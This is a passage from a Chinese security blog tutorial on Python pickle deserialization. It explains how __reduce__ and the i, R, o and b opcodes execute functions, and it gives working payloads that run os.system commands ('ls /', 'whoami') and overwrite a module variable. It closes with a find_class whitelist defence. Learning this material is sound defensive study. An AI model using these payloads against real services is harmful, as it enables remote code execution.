如果返回一个字符串，该字符串应该被解释为全局变量的名称，它应该是对象相对于其模块的本地名称。

当返回一个元组时，它必须包含两到五个成员。可选成员可以省略，也可以提供None作为其值。

每个成员的意义是按顺序规定的：
第一个成员，将被调用的对象，callable。
第二个成员，可调用对象的参数的元组。如果callable不接受任何参数，则必须给出一个空元组。

当Python定义的类中的__reduce__函数返回的元组包含危险代码或可控，就会造成代码执行。
</code></pre>
<p>payload:</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle
<span class="token keyword">import</span> os

<span class="token keyword">class</span> <span class="token class-name">A</span><span class="token punctuation">(</span>object<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token string">'ls /'</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
a <span class="token operator">=</span> A<span class="token punctuation">(</span><span class="token punctuation">)</span>
test <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>a<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>test<span class="token punctuation">)</span><span class="token punctuation">)</span>
</code></pre>
<p>（reduce一次只能执行一个函数，当exec被禁用时，就不能一次执行多条指令了）</p>
<h3 id="全局变量覆盖"><a href="#全局变量覆盖" class="headerlink" title="全局变量覆盖"></a>全局变量覆盖</h3><pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle
<span class="token keyword">import</span> secret
<span class="token keyword">class</span> <span class="token class-name">Test1</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        self<span class="token punctuation">.</span>animal<span class="token operator">=</span><span class="token string">"lees"</span>
    <span class="token keyword">def</span> <span class="token function">check</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> self<span class="token punctuation">.</span>animal<span class="token operator">==</span>secret<span class="token punctuation">.</span>best<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"good!"</span><span class="token punctuation">)</span>

code<span class="token operator">=</span><span class="token string">"your code"</span>
pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>code<span class="token punctuation">)</span>
</code></pre>
<p>在这个例子中，我们是不知道secret模块的，但在Test1类中有要进行判断才能输出good，所以我们只要修改secret的best为lees即可。我们导入一个模块会进入内存，然后我们在内存重构secret使之等于lees。</p>
<p>c操作符调用find_class()来获取对象，而模块、属性都可控，那可以构造payload为：</p>
<pre class=" language-text"><code class="language-text">code=b'\x80\x03c__main__\nsecret\n&#125;X\x04\x00\x00\x00bestX\x04\x00\x00\x00leessb0c__main__\nTest1\n)\x81&#125;X\x04\x00\x00\x00nameX\x04\x00\x00\x00leessb.'
</code></pre>
<h3 id="函数执行"><a href="#函数执行" class="headerlink" title="函数执行"></a>函数执行</h3><p>与函数执行的操作码有<code>i、R、o、b</code></p>
<ul>
<li>i操作码</li>
</ul>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_inst</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    module <span class="token operator">=</span> self<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">"ascii"</span><span class="token punctuation">)</span>
    name <span class="token operator">=</span> self<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">"ascii"</span><span class="token punctuation">)</span>
    klass <span class="token operator">=</span> self<span class="token punctuation">.</span>find_class<span class="token punctuation">(</span>module<span class="token punctuation">,</span> name<span class="token punctuation">)</span>
    self<span class="token punctuation">.</span>_instantiate<span class="token punctuation">(</span>klass<span class="token punctuation">,</span> self<span class="token punctuation">.</span>pop_mark<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
dispatch<span class="token punctuation">[</span>INST<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_inst
<span class="token comment" spellcheck="true">#通过find_class获取方法（os.system），再通过pop_mark获得参数（whomai），并通过_instantiate来执行</span>
</code></pre>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">pop_mark</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    items <span class="token operator">=</span> self<span class="token punctuation">.</span>stack
    self<span class="token punctuation">.</span>stack <span class="token operator">=</span> self<span class="token punctuation">.</span>metastack<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token punctuation">)</span>
    self<span class="token punctuation">.</span>append <span class="token operator">=</span> self<span class="token punctuation">.</span>stack<span class="token punctuation">.</span>append
    <span class="token keyword">return</span> items
<span class="token comment" spellcheck="true">#获取stack栈所有为item，然后弹出metastack栈赋值给stack栈，返回item</span>
</code></pre>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_mark</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    self<span class="token punctuation">.</span>metastack<span class="token punctuation">.</span>append<span class="token punctuation">(</span>self<span class="token punctuation">.</span>stack<span class="token punctuation">)</span>
    self<span class="token punctuation">.</span>stack <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
    self<span class="token punctuation">.</span>append <span class="token operator">=</span> self<span class="token punctuation">.</span>stack<span class="token punctuation">.</span>append
dispatch<span class="token punctuation">[</span>MARK<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_mark
<span class="token comment" spellcheck="true"># ( 操作符</span>
</code></pre>
<p>payload:</p>
<pre class=" language-text"><code class="language-text">b'(X\x06\x00\x00\x00whoamiios\nsystem\n.'
利用 ( 先将whoami存到metastack栈中，在执行 i 操作
</code></pre>
<ul>
<li>R操作码</li>
</ul>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_reduce</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    stack <span class="token operator">=</span> self<span class="token punctuation">.</span>stack
    args <span class="token operator">=</span> stack<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token punctuation">)</span>
    func <span class="token operator">=</span> stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
    stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span> func<span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">)</span>
dispatch<span class="token punctuation">[</span>REDUCE<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_reduce
<span class="token comment" spellcheck="true">#弹出一个数据作为参数（必须是元组），当前stack栈最后一个数据作为函数并执行</span>
</code></pre>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_tuple1</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    self<span class="token punctuation">.</span>stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span>self<span class="token punctuation">.</span>stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token punctuation">)</span>
dispatch<span class="token punctuation">[</span>TUPLE1<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_tuple1
<span class="token comment" spellcheck="true">#\x85将最后一个数据改成元组形式并压到stack栈</span>
</code></pre>
<p>payload：</p>
<pre class=" language-text"><code class="language-text">b'cos\nsystem\nX\x06\x00\x00\x00whoami\x85R.'
</code></pre>
<ul>
<li>o操作码</li>
</ul>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_obj</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment" spellcheck="true"># Stack is ... markobject classobject arg1 arg2 ...</span>
    args <span class="token operator">=</span> self<span class="token punctuation">.</span>pop_mark<span class="token punctuation">(</span><span class="token punctuation">)</span>
    cls <span class="token operator">=</span> args<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
    self<span class="token punctuation">.</span>_instantiate执行<span class="token punctuation">(</span>cls<span class="token punctuation">,</span> args<span class="token punctuation">)</span>
dispatch<span class="token punctuation">[</span>OBJ<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_obj
<span class="token comment" spellcheck="true">#弹栈，将函数和参数交给_instantiate执行</span>
</code></pre>
<p>payload:</p>
<pre class=" language-text"><code class="language-text">b'(cos\nsystem\nX\x06\x00\x00\x00whoamio.'
</code></pre>
<ul>
<li>b</li>
</ul>
<pre class=" language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">load_build</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
    stack <span class="token operator">=</span> self<span class="token punctuation">.</span>stack
    state <span class="token operator">=</span> stack<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token punctuation">)</span>
    inst <span class="token operator">=</span> stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
    setstate <span class="token operator">=</span> getattr<span class="token punctuation">(</span>inst<span class="token punctuation">,</span> <span class="token string">"__setstate__"</span><span class="token punctuation">,</span> None<span class="token punctuation">)</span>
    <span class="token keyword">if</span> setstate <span class="token keyword">is</span> <span class="token operator">not</span> None<span class="token punctuation">:</span>
        setstate<span class="token punctuation">(</span>state<span class="token punctuation">)</span>
        <span class="token keyword">return</span>
    slotstate <span class="token operator">=</span> None
    <span class="token keyword">if</span> isinstance<span class="token punctuation">(</span>state<span class="token punctuation">,</span> tuple<span class="token punctuation">)</span> <span class="token operator">and</span> len<span class="token punctuation">(</span>state<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">2</span><span class="token punctuation">:</span>
        state<span class="token punctuation">,</span> slotstate <span class="token operator">=</span> state
    <span class="token keyword">if</span> state<span class="token punctuation">:</span>
        inst_dict <span class="token operator">=</span> inst<span class="token punctuation">.</span>__dict__
        intern <span class="token operator">=</span> sys<span class="token punctuation">.</span>intern
        <span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> state<span class="token punctuation">.</span>items<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> type<span class="token punctuation">(</span>k<span class="token punctuation">)</span> <span class="token keyword">is</span> str<span class="token punctuation">:</span>
                inst_dict<span class="token punctuation">[</span>intern<span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> v
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                inst_dict<span class="token punctuation">[</span>k<span class="token punctuation">]</span> <span class="token operator">=</span> v
    <span class="token keyword">if</span> slotstate<span class="token punctuation">:</span>
            <span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> slotstate<span class="token punctuation">.</span>items<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                setattr<span class="token punctuation">(</span>inst<span class="token punctuation">,</span> k<span class="token punctuation">,</span> v<span class="token punctuation">)</span>
dispatch<span class="token punctuation">[</span>BUILD<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">=</span> load_build
<span class="token comment" spellcheck="true">#上面实例分析有，不在复述</span>
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre class=" language-text"><code class="language-text">class lees:
    pass

b'\x80\x03c__main__\lees\n)\x81&#125;X\x0C\x00\x00\x00__setstate__cos\nsystem\nsbX\x06\x00\x00\x00whoamib.'
</code></pre>
<h2 id="pker工具"><a href="#pker工具" class="headerlink" title="pker工具"></a><a target="_blank" rel="noopener" href="https://github.com/eddieivan01/pker">pker工具</a></h2><p>pker工具可以仿python产生pickle opcode，当让还是建议手撸，pker辅助。</p>
<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><p>为了解决pickle反序列化的问题，官方给的方法是重写<code>Unpickler.find_class()</code>加入白名单来解决，并且给出警告：对于允许反序列化的对象必须要保持警惕。对于开发者而言，如果实在要给用户反序列化的权限，最好使用双白名单限制<code>module</code>和<code>name</code>并充分考虑到白名单中的各模块和各函数是否有危险。</p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8342">https://xz.aliyun.com/t/8342</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/89132768">https://zhuanlan.zhihu.com/p/89132768</a></p>
<p>深入学习：</p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1294/#toc_python">https://tttang.com/archive/1294/#toc_python</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436">https://xz.aliyun.com/t/7436</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7012">https://xz.aliyun.com/t/7012</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Lees</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://lees01.gitee.io/2021/10/15/python-pickle-fan-xu-lie-hua/">https://lees01.gitee.io/2021/10/15/python-pickle-fan-xu-lie-hua/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Lees</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                    <span class="chip bg-color">反序列化</span>
                                </a>
                            
                                <a href="/tags/python/">
                                    <span class="chip bg-color">python</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/10/23/linux-de-proc-xia-de-self-xue-xi/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/3.jpg" class="responsive-img" alt="Linux的/proc/self/学习">
                        
                        <span class="card-title">Linux的/proc/self/学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            &#x2F;proc目录&#x2F;proc是一个虚拟文件系统。它有时也被称为进程信息伪文件系统，它提供了一种内核数据结构的接口。它不包含真实的文件，而是包含运行时系统信息（例如系统内存、安装的设备、硬件配置等）。它只存在内存当中，而不占用
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-10-23
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Linux/" class="post-category">
                                    Linux
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Linux/">
                        <span class="chip bg-color">Linux</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/10/11/ssti/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/11.jpg" class="responsive-img" alt="SSTI(服务器模板注入)">
                        
                        <span class="card-title">SSTI(服务器模板注入)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            前言官方解释：“模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，用于网站的模板引擎就会生成一个标准的HTML文档。”
模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-10-11
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B3%A8%E5%85%A5/" class="post-category">
                                    注入
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SSTI/">
                        <span class="chip bg-color">SSTI</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('100')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE' || selection.getRangeAt(0).commonAncestorContainer.nodeName === 'CODE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Lees&#39;s Blog<br />'
            + '文章作者: Lees<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2022</span>
            
            <a href="/about" target="_blank">Lees</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">22.6k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
                <span id="sitetime"> Loading ...</span>
                <script>
                    var calcSiteTime = function () {
                        var seconds = 1000;
                        var minutes = seconds * 60;
                        var hours = minutes * 60;
                        var days = hours * 24;
                        var years = days * 365;
                        var today = new Date();
                        var startYear = "2021";
                        var startMonth = "9";
                        var startDate = "5";
                        var startHour = "0";
                        var startMinute = "0";
                        var startSecond = "0";
                        var todayYear = today.getFullYear();
                        var todayMonth = today.getMonth() + 1;
                        var todayDate = today.getDate();
                        var todayHour = today.getHours();
                        var todayMinute = today.getMinutes();
                        var todaySecond = today.getSeconds();
                        var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                        var diff = t2 - t1;
                        var diffYears = Math.floor(diff / years);
                        var diffDays = Math.floor((diff / days) - diffYears * 365);

                        // 区分是否有年份.
                        var language = 'zh-CN';
                        if (startYear === String(todayYear)) {
                            document.getElementById("year").innerHTML = todayYear;
                            var daysTip = 'This site has been running for ' + diffDays + ' days';
                            if (language === 'zh-CN') {
                                daysTip = '本站已运行 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                daysTip = '本站已運行 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = daysTip;
                        } else {
                            document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                            var yearsAndDaysTip = 'This site has been running for ' + diffYears + ' years and '
                                + diffDays + ' days';
                            if (language === 'zh-CN') {
                                yearsAndDaysTip = '本站已运行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                yearsAndDaysTip = '本站已運行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = yearsAndDaysTip;
                        }
                    }

                    calcSiteTime();
                </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:lees01@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2578546966" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2578546966" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
